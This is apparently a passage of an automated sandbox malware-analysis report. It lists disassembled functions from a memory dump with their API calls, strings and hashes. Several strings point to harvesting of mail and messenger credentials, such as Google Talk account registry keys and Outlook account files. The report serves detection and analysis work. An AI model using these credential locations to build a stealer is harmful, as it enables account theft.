                                                                                            • strlen.MSVCRT ref: 00403897
                                                                                            • sprintf.MSVCRT ref: 004038B7
                                                                                            • _mbscpy.MSVCRT ref: 004038CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                            • String ID: %s@yahoo.com
                                                                                            • API String ID: 317221925-3288273942
                                                                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403504
                                                                                            • memset.MSVCRT ref: 0040351A
                                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                            • _mbscpy.MSVCRT ref: 00403555
                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                            • _mbscat.MSVCRT ref: 0040356D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                            • API String ID: 3071782539-966475738
                                                                                            • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                            • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 2054149589-0
                                                                                            • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                            • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                            • memset.MSVCRT ref: 00408620
                                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                            • memset.MSVCRT ref: 00408671
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                            Strings
                                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                                            • API String ID: 1366857005-1079885057
                                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor_mbsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 882979914-1578091866
                                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                            • memset.MSVCRT ref: 00410E10
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                            • _mbscpy.MSVCRT ref: 00410E87
                                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 889583718-2036018995
                                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004109F7
                                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                            • memset.MSVCRT ref: 00410A32
                                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                            • String ID:
                                                                                            • API String ID: 3143880245-0
                                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@mallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3831604043-0
                                                                                            • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                            • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirect_mbscpymemset
                                                                                            • String ID: Arial
                                                                                            • API String ID: 3853255127-493054409
                                                                                            • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                            • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$_strcmpimemset
                                                                                            • String ID: /stext
                                                                                            • API String ID: 520177685-3817206916
                                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                            • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                                                            • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                            • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 145871493-0
                                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                            • String ID:
                                                                                            • API String ID: 4165544737-0
                                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
